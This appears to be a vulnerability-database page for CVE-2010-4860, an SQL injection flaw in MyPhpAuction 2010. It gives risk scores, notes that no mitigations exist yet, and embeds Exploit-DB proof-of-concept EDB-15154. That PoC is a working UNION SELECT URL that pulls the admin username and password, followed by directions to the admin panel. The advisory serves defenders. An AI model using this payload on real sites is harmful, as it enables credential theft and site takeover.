CVE-2010-4860

high
Published 2011-10-05 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

SQL injection vulnerability in product_desc.php in MyPhpAuction 2010 allows remote attackers to execute arbitrary SQL commands via the id parameter.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-15154 webapps php verified text ยท 1 KB
h4ck3r ยท 2010-09-29

MyPhpAuction 2010 - 'id' SQL Injection

text exploit Source: Exploit-DB
==
# Title: MyPhpAuction 2010 (id) Remote SQL Injection Vuln
# Version: 2010
# Link: http://galaxyscriptz.com/products/MyPhpAuction-2010.html
==
# Author: BorN To K!LL - h4ck3r
# Contact: SQL@hotmail.co.uk
==
# 3xploit:
/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--

then get username & password n then go to the admin panel ,,

# Admin Panel:
/admin


# Greetings:
Dr.2 , Inject0r's Community , AsbMay's Group , darkc0de team , and all ma friends ,,
==
 		 	   		  

Application impact

VendorProductVersionsFixed
galaxyscriptzmyphpauction2010

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.